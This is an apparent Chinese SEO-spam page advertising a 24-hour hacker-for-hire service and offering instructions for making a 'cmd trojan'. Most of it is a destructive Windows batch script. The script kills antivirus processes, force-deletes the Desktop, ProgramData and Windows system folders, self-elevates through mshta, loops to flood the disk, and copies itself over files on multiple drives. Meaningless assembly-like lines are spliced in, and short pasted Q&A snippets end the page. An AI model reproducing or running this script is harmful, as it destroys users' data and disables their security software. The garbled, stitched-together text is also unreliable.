今天分享{黑客24小时在线接单网站}的知识,会对cmd木马制作解释,如果解决了您的问题可以收藏本站。
写cmd病毒
代码是
echo off
JMP Label1
Db thunkcode1
Label2:
JMP Label3
Db thunkcode3
Label1:
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:jjj
JMP Label3
Db thunkcode3
Label1:ss
JMP Label2
Db thunkcode2
Label3:mm
taskkill /f /im 360DesktopLite.exe
jz label
jnz label
db thunkcode
label:
jz label2
jnz label2
db thunkcode
lable2
mov ax, 8
xor ax, 77
taskkill /f /im explore.exe
taskkill /f /im 360tray.exe
taskkill /f /im 360Safe.exe
echo off
taskkill /f /im 360tray.exe
JMP Label1
Db thunkcode1
Label2:
JMP Label3
Db thunkcode3
Label1:
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
JMP Label3
Db thunkcode3
Label1:
JMP Label2
Db thunkcode2
Label3:
taskkill /f /im 360tray.exe
taskkill /f /im ZhuDongFangYu.exe
rmdir /s/q C:\Users\administrator\Desktop
rmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
rmdir /s/q C:\ProgramData
del /f /s /q regedit.exe
JMP Label1
Db thunkcode1
Label2:
JMP Label3
Db thunkcode3
Label1:
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
JMP Label3
Db thunkcode3
Label1:
JMP Label2
Db thunkcode2
Label3:
call label_1
db thunkcode
jmp label_2
db thunkcode
label_1:
pop eax
jmp label_3
db thunkcode,thunkcode,thunkcode
label_3:
inc eax
jmp label_4
db thunkcode,thunkcode,thunkcode
label_4:
jmp eax
db thunkcode
label_2:
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
::wwwwwww::rrrrrr%%tttt
rmdir /s/q C:\Windows\minidump
rmdir /s/q C:\Windows\Microsoft.NET
ftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1
for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
:a
set /a a+=1
echo %random%-%random%-%random% C:\Users\%username%\Desktop\CCBL.%random%
mshta javascript:alert(".");close();
goto a
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" nul
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i"
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" nul
rmdir /s/q C:\Windows\Offline Web Pages
解决cmd.exe的 木马病毒
您好
cmd.exe是系统执行命令的一个程序,本身并非是病毒
建议您可以到腾讯电脑管家官网下载电脑管家
然后使用电脑管家——杀毒——全盘查杀,检测一下
电脑管家拥有2大云杀毒引擎和全国最大的云病毒库,如果该程序中带有木马病毒,电脑管家一定可以及时为您找出来并彻底根除。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
腾讯电脑管家企业平台:
用cmd可以编病毒或木马吗?
cmd指的是批处理还是命令提示符?
如果是批处理的话,编写一个恶作剧的小小“病毒”应该是可以的,木马好像功能太少……
关于{黑客24小时在线接单网站}和cmd木马制作的帮助到此结束了。